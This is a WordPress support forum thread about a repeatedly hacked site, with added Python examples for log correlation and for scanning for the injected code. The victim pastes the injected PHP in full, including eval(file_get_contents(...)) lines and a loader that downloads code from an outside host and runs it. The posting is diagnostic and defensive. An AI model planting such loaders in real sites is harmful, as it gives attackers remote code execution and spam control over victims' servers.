• For some reason,

    my index.php in my root folder seems to keep getting compromised. I found last week that within the file there had been a link to a viagra file in the main directory. I fixed this, changed passwords, etc. and upgraded WP, but it has happened again! The following was in my index.php file:

    eval(file_get_contents("/home/wrestlin/public_html/js/751b80d2ef316f0a050bbc2867bc028f"));

    the file in question was littered with viagra text.

    I have no spyware or anything like this on my machine, and the passwords are changed regularly. Only one other person has access to FTP, but surely it’s not him and it shows ME as the owner of both of these files in terms of modifying etc.

    I have looked at the index.php file and it says modified 29/01/2010 and the viagra file in question was uploaded today.

    I don’t know what to do. I’ve done everything I know in terms of security, passwords, etc. but it keeps happening, and it has also destroyed my search engine credibility.

Viewing 15 replies - 1 through 15 (of 25 total)
  • http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    And when you’re done:
    http://codex.wordpress.org/Hardening_WordPress
    Just in case you haven’t read everything.

    Do you have access to server access logs? Look at the timestamp for your index.php file to see exactly what time it was altered.

    Compare that to your access logs to see where it was being altered from.

    Quite possibly, someone has inserted a rogue file deep on your server somewhere that keeps allowing access to your files.

    That’s what happened to me. I had 2 files, neither in my WP install... they were hidden well.
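    One way to do the timestamp-to-log correlation described above, as an added example that is not part of this thread: take the modification time of the tampered file, pull every request within a few minutes of it out of the Apache access log, and then narrow to requests that could have written to disk (POSTs to anything that is not a normal WordPress entry point). The log lines, the mtime and the /old/upload.php path are all constructed for the example.

```python
import re
from datetime import datetime, timedelta, timezone

# Apache "combined" access-log line: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample log (not from the thread): one POST to a leftover upload
# script seconds before index.php was rewritten, surrounded by ordinary traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [29/Jan/2010:14:02:11 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [29/Jan/2010:14:02:30 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.23 - - [29/Jan/2010:14:03:40 +0000] "POST /old/upload.php HTTP/1.1" 200 12 "-" "Mozilla/4.0"
198.51.100.23 - - [29/Jan/2010:14:03:41 +0000] "GET /index.php HTTP/1.1" 200 5300 "-" "Mozilla/4.0"
203.0.113.7 - - [29/Jan/2010:16:30:05 +0000] "GET /wp-admin/ HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

# Constructed modification time of the tampered file (what `stat index.php` reports).
FILE_MTIME = datetime(2010, 1, 29, 14, 3, 50, tzinfo=timezone.utc)

# Paths WordPress itself accepts POSTs on; a POST anywhere else deserves a look.
WP_POST_TARGETS = ("/wp-login.php", "/wp-comments-post.php", "/xmlrpc.php",
                   "/wp-admin/", "/wp-cron.php")


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "time": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def requests_near(log_text, mtime, window=timedelta(minutes=5)):
    """All requests whose timestamp lies within +/- window of the file's mtime."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and abs(rec["time"] - mtime) <= window:
            hits.append(rec)
    return hits


def suspect_writers(hits):
    """Requests in the window that could have written to disk: POSTs to any
    path that is not a standard WordPress POST target."""
    return [
        r for r in hits
        if r["method"] == "POST" and not r["path"].startswith(WP_POST_TARGETS)
    ]


if __name__ == "__main__":
    for r in suspect_writers(requests_near(SAMPLE_LOG, FILE_MTIME)):
        print(f"{r['time']:%Y-%m-%d %H:%M:%S} {r['ip']} {r['method']} "
              f"{r['path']} {r['status']}")
```

    The path that shows up here is the thing to pull apart next, not just the IP that called it. A file written over FTP or SFTP never appears in the HTTP access log at all, so if the window is empty, check the FTP log for the same minutes before assuming the log is incomplete.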

    Thread Starter amishpatel (@amishpatel)

    Hey,

    I followed the re-install and hardening instructions after the first attempt. I think I have access to server logs, I will see if they help!

    Thanks..

    I bet they will... I’ve seen this fix help many people. After you track down and delete the rogue files, go through the process of changing passwords again. Maybe reinstall WP; also reinstall all plugins, they can get dirty too. And your themes: either reinstall or clean up.

    RVoodoo knows of what he speaks – do everything he has mentioned diligently

    I’ve tried to block access to some IPs and .ru domains by .htaccess but this gets overwritten with each WP update or editing of permalinks. This seems an area to be addressed by the developers.

    @starapple — be sure you don’t put your .htaccess tweaks between the # BEGIN WORDPRESS and # END WORDPRESS lines of the file.

    First of all, you should be running a firewall.

    WordPress Firewall SEO

    You also need: WP Security Scan

    and: WP-DBManager

    Thread Starter amishpatel (@amishpatel)

    I will follow the above.

    Index.php was compromised again today…

    I have deleted a ton of old stuff from my server, including numerous scripts etc. which may have been used to get in.

    Checking access logs... I found the entry of the malicious file and it came from my IP, so I’m not sure why that’s the case; my machine is clean.

    Thread Starter amishpatel (@amishpatel)

    Guys,

    I need help. I can’t stop this! I have done everything that’s been suggested and then some.

    My index.php files are no longer being compromised, but instead now, somehow, my header.php is being edited with the following line inserted at the top:

    <? eval(file_get_contents("/my directories/wp-content/751b80d2ef316f0a050bbc2867bc028f")); ?>

    It happened yesterday, but the file was placed in a different WordPress directory.

    Previous to that, these type of files were being placed in my directories at root level.

    We have checked FTP logs, but there is absolutely nothing. Myself and one other person have admin/FTP access. The other guy only has access to our WordPress folder and not root.

    There is nothing malicious on my machine I don’t believe – I’ve done spyware tests etc.

    I don’t know what to do, I can’t stop this, and it’s happening every day, and the script can seemingly be inserted into any directory on my server and any file can seemingly be edited to reflect where this is.

    I’ve changed passwords, made sure dirs are chmod correctly, deleted unwanted items etc. but I just can’t stop this and its killing my Website and my search engine standings.

    Can someone please help or offer suggestions on anyone who could help? I can’t do any more on my end that I know of..

    Thread Starter amishpatel (@amishpatel)

    Anybody?

    Moderator Jan Dembowski (@jdembowski), Forum Moderator and Brute Squad

    > I have done everything that’s been suggested and then some.

    > We have checked FTP logs, but there is absolutely nothing. Myself and one other person has admin/FTP access. The other guy only has access to our WordPress folder and not root.

    > I have deleted a ton of old stuff from my server, including numerous scripts etc. which may have been used to get in.

    There is no easy fix, and did you really do what RVoodoo and Samboll said to do?

    Try this:

    Make a complete file and database copy of your blog and put that somewhere safe. Export your database to a WXR file and keep that in a safe place too.

    Take a deep breath. Now with those backups and WXR files preserved safely, DELETE YOUR WORDPRESS DATABASE AND ALL-OF-YOUR-FILES-AND-DIRECTORIES ON YOUR WEB SERVER THAT YOU BACKED UP.

    Bet that got your attention?

    Since this keeps coming back, you are not getting the infected files. Or the PC you are accessing this via really is compromised too. Once it’s all deleted download fresh copies of everything from the source and do not touch your backup.

    Get WordPress running and import the WXR file into your new blank blog. Only use the file backup for jpegs, images, etc. that are referenced in your blog.

    If all that does not work, get a beer, relax for a while and then solicit help from jobs.wordpress.net for this problem.

    Good luck.

    Edit: Oh, and using a text editor, examine the WXR (don’t modify it!) for any compromised links too. If the hack is in your export, then putting that back would be bad. Make sure it’s clean too.

    Keep in mind that it might be the way your server is set up and could have nothing to do w/ WordPress. Maybe you should contact your hosting company tech support (unless that is you).

    So you set up the Firewall and followed all the suggestions in WP Security Scan, and you uploaded a fresh copy of all of the WP files and your config file? You can also use WP DB Manager to optimize and repair the database as well as to back it up, and you can use it to empty or drop tables from the database.

    I tried once to export a WP site’s data and then import it but it didn’t work very well at all. It imported the categories but not the content.

    Personally I would exhaust all support options before deleting the database. Deleting the files is no big deal. You can re-upload them any time. You can even upload them to a different domain or folder and then run two lines of code to make the database recognize the new URL.

    Another thing you could do rather than deleting your database is create a new one and modify your config file to point to it. Either way you would have to initialize the database to build the tables but you would still have a way to access your previous data. Aside from completely deleting the database you can also drop tables or just empty the tables. The advantage of the former is that you would not have to modify your config file and the advantage of the latter is that you also would not need to initialize the database. Just throwing all the options out there.

    If you’re doing any of this on a small site your best bet might be to copy & paste your content back in w/ the editor in HTML mode. That way you could check for any wacky code in the content. You can save the code for each page in a text file and then put it back into your clean database.

    Try hosting support before trying any of this drastic stuff.

    Thread Starter amishpatel (@amishpatel)

    Happened again.

    This time actual links were also inserted into footer.php. So that’s header.php, footer.php, and index.php in root that have all been modified now.

    I have disabled FTP access completely to see if this stops the problem. I have gone through all the steps as advised apart from your suggestions, jdembowski; I’m a bit scared to do that and really don’t have time now I’ve started a new job!

    I tried posting at wordpress jobs but it’s really annoying me because my post won’t go through properly – keeps saying my spam answer is wrong, when it’s not. Tried a lot of times now.

    I’ve had it with this and don’t know what to do anymore. Would anyone here be so kind as to take a look? I don’t mind paying if it can be solved – I just have no time to deal with this anymore and I’m quite desperate.. it’s also killing my search engine rank and traffic in general.

    I’ll be forever grateful if someone can help out..

    Thread Starter amishpatel (@amishpatel)

    Usually the hacked file just contains divs and a viagra link, but this one today contained:

    <?
    $dir ='6845734';
    // One target page per line; the CRLF line endings matter for the explode() below
    $pages = 'www.wrestling-edge.com
    www.wrestling-edge.com/mma-news
    www.wrestling-edge.com/mma-news/brock-lesnars-next-ufc-fight-against-shane-carwin-cancelled.html
    www.wrestling-edge.com/mma-news/chuck-liddell-and-mma-come-to-the-simpsons-this-sunday-night.html
    www.wrestling-edge.com/search/kelly+kelly+naked
    www.wrestling-edge.com/search/mickie+james+ass+pics
    www.wrestling-edge.com/site
    www.wrestling-edge.com/site/advertise
    www.wrestling-edge.com/wrestling-ppv-coverage
    www.wrestling-edge.com/wrestling-videos
    www.wrestling-edge.com/wwe-news/chyna-in-a-japan-hall-of-fame-update-on-mickies-country-music-more.html
    www.wrestling-edge.com/wwe-news/raw-going-to-three-hours-wrestlemania-2011-location-more.html
    www.wrestling-edge.com/wwe-news/spoiler-smackdown-elimination-chamber-match-revealed.html
    www.wrestling-edge.com/wwe-news/the-rock-hints-at-wwe-return-says-he-wants-to-do-more-than-guest-host-raw.html
    www.wrestling-edge.com/wwe-news/wwe-smackdown-vs-raw-2010-road-to-wrestlemania-storyline-info.html
    www.wrestling-edge.com/wwe-results/wwe-raw-results-october-5th-2009.html
    www.wrestling-edge.com/wwe-results/wwe-royal-rumble-2010-ppv-results.html
    ';
    // These two lines sit outside the loop in the posted copy, so $page is undefined here
    @eval(@file_get_contents('http://file-upload.co.cc/'.$dir.'/'.md5($page)));
    $c_url = 'http://file-upload.co.cc/'.$dir.'/'.md5($page);

    $pages=explode("\r\n",$pages);
    // Current request host + URI, with "www." and every slash stripped for comparison
    $url=trim(str_replace('www.','',$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']));
    $url=str_replace('/','',$url);
    foreach($pages as $page){
       $page=trim(str_replace('www.','',$page));
       if ($url==str_replace('/','',$page)){
          // Fetch a per-page payload named md5($page) from the remote host and execute it
          if(ini_get('allow_url_fopen')==1){
             @eval(@file_get_contents('http://file-upload.co.cc/'.$dir.'/'.md5($page)));
          }
          else{
             // Fall back to cURL when remote fopen is disabled
             if(function_exists('curl_init')){
                $ch = curl_init();
                $c_url = 'http://file-upload.co.cc/'.$dir.'/'.md5($page);
                curl_setopt($ch, CURLOPT_URL, $c_url);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_TIMEOUT, 10);
                $data =  curl_exec($ch);
                @eval($data);
             }
          }
          break;
       }
    }
    ?>

    Weirdly, it still produced the same output in Google’s cache for the Website. The links in footer.php were just standard href tags to numerous viagra and the like sites.
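    To see what the script above does on a given request, and to find other copies of the injected code in the tree, here is an added Python example that is not part of the thread. It reproduces the script's page matching and md5 key derivation (the remote host and directory are the ones in the posted code; the page list is constructed on example.com) and adds a small heuristic scanner modelled on the three injected forms seen in this thread: eval over file_get_contents, eval over a curl_exec result, and data files named with a 32-character hex string. The file contents it scans are constructed, and it makes no network request.

```python
import hashlib
import re

# Host and directory copied from the posted script; never fetched here.
C2_BASE = "http://file-upload.co.cc/6845734/"

# Constructed page list standing in for the script's own (hosts changed to example.com).
# The script splits on "\r\n", so the separators are CRLF.
PAGES = "www.example.com\r\nwww.example.com/mma-news\r\nwww.example.com/site/advertise\r\n"


def normalize(s):
    """Mirror trim(str_replace('www.', '', $s)): drop every 'www.', then whitespace."""
    return s.replace("www.", "").strip()


def payload_key(page):
    """md5 of the normalized *listed* page string: the file name fetched from the C2."""
    return hashlib.md5(normalize(page).encode()).hexdigest()


def select_payload(host, uri, pages=PAGES):
    """Return the C2 URL the script would eval for this request, or None when the
    page is not listed. Slashes are removed before comparing, exactly as the script
    does, so '/mma-news' and '/mma-news/' both match the same entry."""
    url = normalize(host + uri).replace("/", "")
    for page in pages.split("\r\n"):
        page = normalize(page)
        if page and url == page.replace("/", ""):
            return C2_BASE + payload_key(page)
    return None


# Heuristic signatures for the injected code seen in the thread.
SIGNATURES = [
    # eval(file_get_contents(...)) with optional @ suppression, local or remote path
    re.compile(r"@?eval\s*\(\s*@?file_get_contents\s*\("),
    # a curl_exec() result handed to eval() within the next 200 characters
    re.compile(r"curl_exec\s*\([^;]*;[\s\S]{0,200}?@?eval\s*\(\s*\$\w+\s*\)"),
]
# Payload files in this thread were named by an md5 hex digest.
HEX_NAME = re.compile(r"(^|/)[0-9a-f]{32}$")


def scan_files(files):
    """files: {relative path: contents}. Returns sorted paths that match a
    signature by content or by a 32-hex-character file name."""
    flagged = []
    for path, text in files.items():
        if HEX_NAME.search(path) or any(sig.search(text) for sig in SIGNATURES):
            flagged.append(path)
    return sorted(flagged)


# Constructed file contents, modelled on the snippets posted in the thread.
SAMPLE_FILES = {
    "wp-content/themes/x/header.php":
        '<? eval(file_get_contents("/home/site/wp-content/751b80d2ef316f0a050bbc2867bc028f")); ?>\n<html>',
    "wp-content/uploads/cache.php":
        "<?php $ch=curl_init(); curl_setopt($ch, CURLOPT_URL, $c_url); "
        "$data = curl_exec($ch); @eval($data); ?>",
    "js/751b80d2ef316f0a050bbc2867bc028f":
        "echo '<div style=\"display:none\">...</div>';",
    "wp-content/themes/x/footer.php":
        "</body></html>",
    "wp-includes/functions.php":
        "<?php function wp_json_encode($data) { return json_encode($data); }",
}


if __name__ == "__main__":
    print(select_payload("www.example.com", "/mma-news/"))
    print(scan_files(SAMPLE_FILES))
```

    Two things the emulation makes visible: the payload is chosen per listed page, so different URLs on the same site can serve different injected content, and the md5-named data file contains whatever the remote host returned, not an eval call of its own, which is why searching only for "eval" misses it. Treat the scanner's hits as a starting point and read each flagged file; plugins and themes occasionally use eval legitimately.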

  • The topic ‘WordPress Keeps Being Hacked!’ is closed to new replies.